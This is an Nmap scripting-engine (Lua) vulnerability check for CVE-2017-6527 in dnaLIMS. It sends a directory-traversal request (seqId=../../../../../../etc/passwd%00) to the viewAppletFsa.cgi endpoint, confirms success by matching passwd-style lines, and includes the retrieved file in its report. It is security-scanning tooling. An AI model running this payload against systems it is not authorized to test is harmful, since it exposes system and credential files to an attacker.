local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"
-- NSE script description (shown by `nmap --script-help`); the same text is
-- reused as the vulnerability description in the report built by `action`.
description = [[
dnaLIMS is prone to the Directory Traversal attack.
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]]
---
-- @usage
-- nmap --script http-vuln-cve2017-6527 <target>
--
-- @args
-- http-vuln-cve2017-6527.uri  Base path prepended to the CGI request path.
-- Default: '/'
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-vuln-cve2017-6527
-- | VULNERABLE:
-- | dnaLIMS is prone to the Directory Traversal attack.
-- | State: VULNERABLE (Exploitable)
-- | IDs:
-- | CVE: CVE-2017-6527
-- | CWE: 22
-- | The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
-- | This allows an unauthenticated attacker to retrieve files on the operating system accessible by
-- | the permissions of the web server. This page also does not require authentication, allowing
-- | any person on the Internet to exploit this vulnerability.
-- |
-- | References:
-- | https://www.cvedetails.com/cve/CVE-2017-6527
-- | https://www.cvedetails.com/cwe-details/22/cwe.html
---
author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
-- "intrusive"/"exploit": the check sends a traversal payload and reads the
-- response, so it is excluded from the default/safe category set.
categories = {"vuln", "intrusive", "exploit"}
-- Run only against open TCP ports 80/443 or ports identified as http/https.
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
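--- Probe the dnaLIMS viewAppletFsa.cgi endpoint for CVE-2017-6527.
--
-- Sends a single GET request carrying the traversal payload under the
-- configured base path and reports the host as vulnerable only when the
-- response looks like an /etc/passwd file.
--
-- @param host NSE host table (host.ip is used for logging).
-- @param port NSE port table for the HTTP service.
-- @return A vulns report string when exploitable, otherwise nil.
action = function(host, port)
  -- Base path under which the CGI is served. Normalise it to end with "/"
  -- so that a value such as "/dna" still yields a well-formed request path.
  local uri = stdnse.get_script_args(SCRIPT_NAME .. ".uri") or "/"
  if uri:sub(-1) ~= "/" then
    uri = uri .. "/"
  end
  local vulnPath = "cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1"
  local request_path = uri .. vulnPath

  local response = http.get(host, port, request_path)
  -- `host` is a table, so it cannot be concatenated directly; log its address.
  -- Passing format arguments to debug1 also avoids building the string when
  -- debugging is disabled.
  stdnse.debug1("GET request being processed with payload on %s%s", host.ip, request_path)

  -- Anything but a 200 means the endpoint did not serve the requested file.
  if not response or response.status ~= 200 then
    return nil
  end

  -- Evidence check: a passwd-style line (colon-separated fields, possibly
  -- with an empty GECOS field) must appear in the body.
  local body = response.body or ""
  if not string.match(body, "([^:]+):([^:]+):([^:]+):([^:]+)::?([^:]+):([^:]+):([^:]+)") then
    return nil
  end

  local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = "dnaLIMS is prone to the Directory Traversal attack.",
    state = vulns.STATE.EXPLOIT,
    description = [[
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]],
    IDS = {
      CVE = "CVE-2017-6527",
      CWE = "22",
      references = {
        "https://www.cvedetails.com/cve/CVE-2017-6527",
        "https://www.cvedetails.com/cwe-details/22/cwe.html"
      },
      dates = {
        disclosure = {
          year = "2017",
          month = "03",
          day = "09"
        },
      }
    },
    -- The retrieved content is attached as proof of exploitability.
    exploit_results = body
  }
  return vulnReport:make_output(vuln)
end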